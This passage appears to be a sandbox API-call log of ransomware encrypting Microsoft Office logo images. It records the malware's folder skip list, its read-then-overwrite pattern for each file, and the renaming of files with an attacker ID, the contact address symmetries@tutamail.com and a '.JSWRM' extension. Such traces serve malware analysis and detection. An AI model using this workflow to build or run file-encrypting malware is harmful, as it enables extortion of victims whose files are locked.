[0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.410] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0133.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0133.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.411] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2020) returned 1 [0133.411] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.411] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0133.414] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.414] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0133.415] CloseHandle (hObject=0x238) returned 1 [0133.415] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.416] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.contrast-black_scale-180.png", cAlternateFileName="ON9A29~1.PNG")) returned 1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.416] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0133.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0133.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.417] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2482) returned 1 [0133.417] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.417] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9b0, lpOverlapped=0x0) returned 1 [0133.419] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.419] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9b0, lpOverlapped=0x0) returned 1 [0133.419] CloseHandle (hObject=0x238) returned 1 [0133.419] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.420] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x605, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.contrast-black_scale-80.png", cAlternateFileName="ON3426~1.PNG")) returned 1 [0133.420] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.420] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.420] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.420] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.420] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.421] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0133.421] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.421] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.421] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.421] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0133.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0133.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0133.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d260, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0133.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.422] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1541) returned 1 [0133.422] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.422] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0133.427] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.428] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0133.428] CloseHandle (hObject=0x238) returned 1 [0133.428] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.429] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x73a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.contrast-white_scale-100.png", cAlternateFileName="ON2492~1.PNG")) returned 1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.429] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0133.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0133.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.430] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1850) returned 1 [0133.430] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.430] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x730, lpOverlapped=0x0) returned 1 [0133.432] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.432] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x730, lpOverlapped=0x0) returned 1 [0133.433] CloseHandle (hObject=0x238) returned 1 [0133.433] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.434] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ef, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.contrast-white_scale-140.png", cAlternateFileName="OND60E~1.PNG")) returned 1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.434] lstrcmpiW (lpString1="OneNoteLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0133.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0133.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.435] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2031) returned 1 [0133.435] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.435] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0133.437] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.437] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0133.438] CloseHandle (hObject=0x238) returned 1 [0133.438] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.441] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, 